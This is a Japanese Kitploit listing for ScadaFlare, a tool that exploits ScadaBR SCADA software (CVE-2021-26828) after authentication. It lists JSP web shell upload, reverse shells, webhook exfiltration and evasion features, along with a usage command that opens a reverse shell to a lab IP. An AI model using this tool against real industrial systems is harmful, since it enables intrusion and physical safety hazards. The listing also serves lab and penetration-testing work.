Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-26828-Ultimate — ScadaFlare ScadaBR向け認証済みRCEエクスプロイトフレームワーク (CVE-2021-26828) OpenPLC ScadaBR | Kitploit
ツール/GitHubGitHub/ridpath/cve-2021-26828-ultimate
ペイロード生成脆弱性分析エクスプロイトSCADA/ICSセキュリティウェブアプリケーション悪用情報収集ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubridpath/cve-2021-26828-ultimate

CVE-2021-26828-Ultimate

ScadaFlare ScadaBR向け認証済みRCEエクスプロイトフレームワーク (CVE-2021-26828) OpenPLC ScadaBR

58ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
リポジトリを見る

ScadaFlare - CVE-2021-26828 認証済みRCEエクスプロイトツールキット

license: MIT tested-on: HTB Alchemy target: ScadaBR <1.1.0 platform: Linux/Windows

ScadaBR <1.1.0 を標的としたモジュール式の認証後RCEエクスプロイトで、レッドチーム運用向けに機能強化されました。

ScadaFlare デモ

機能

  • view_edit.shtm を介して武器化された .jsp シェルをアップロード
  • Linux および Windows ペイロードに対応
  • SOCKS5 / HTTP プロキシ対応
  • リバースシェルトリガー(標準または base64)
  • 列挙モジュール(DB、認証情報、Log4Shell など)
  • Webhook データ外部送信(Slack / Discord)
  • Metasploit リソーススクリプト生成
  • クリーンアップ対応(キルスイッチ)

MITRE ATT&CK テクニックマッピング

CVE

  • CVE-2021-26828
  • 発見者: Fellipe Oliveira
  • エクスプロイトの機能強化とモジュール化

存在理由

このエクスプロイトは HTB Pro Lab: Alchemy シナリオの分析中に開発されました。Fellipe Oliveira による元の PoC は堅牢でしたが、以下の課題がありました。

  • Python 2 で記述されていた
  • プロキシ対応、シェルクリーンアップ、列挙チェーンなどの最新機能が不足していた
  • 拡張やレッドチームワークフローへの統合が困難だった

この ScadaFlare バージョンは Python 3 での完全な書き直しであり、モジュール対応、複数の回避戦略、OS 検出オーバーライド、Webhook 統合、SOCKS プロキシ対応、実運用オペレーター向けの列挙チェーンを備えています。

使用方法

root@kitploit:~
python3 scadaflare.py http://172.16.0.20:80 admin admin \
  --reverse-ip 10.10.14.44 --reverse-port 4445 \
  --verbose --cleanup

法的・倫理的使用のみ

ScadaFlare は専ら以下の目的で設計されています:

  • 倫理的ハッキング教育
  • SCADA ラボテスト
  • 防御研究と脆弱性検証

実際の産業システムに対する不正使用は以下の可能性があります:

  • 物理プロセスの中断
  • 損害や安全上の危険の発生
  • 重大な法的結果

本ツールを使用することで、以下の責任を完全に受け入れたことになります:

  • 明示的な書面による許可の取得
  • 承認された環境内でのみの操作

ライセンス

MIT ライセンス – LICENSE を参照

ツールをダウンロード
フェーズテクニックID
初期アクセス(認証後)有効なアカウントT1078
実行公開アプリケーションのエクスプロイトT1190
コマンド実行Web シェルT1505.003
権限アクションWeb コンテンツの改変T1505
資格情報アクセス設定ファイル内の資格情報T1552.001
探索リモートシステムの探索T1018
データ外部送信Web サービス経由のデータ外部送信T1567.002
防御回避プロキシとプロトコルトンネリングT1090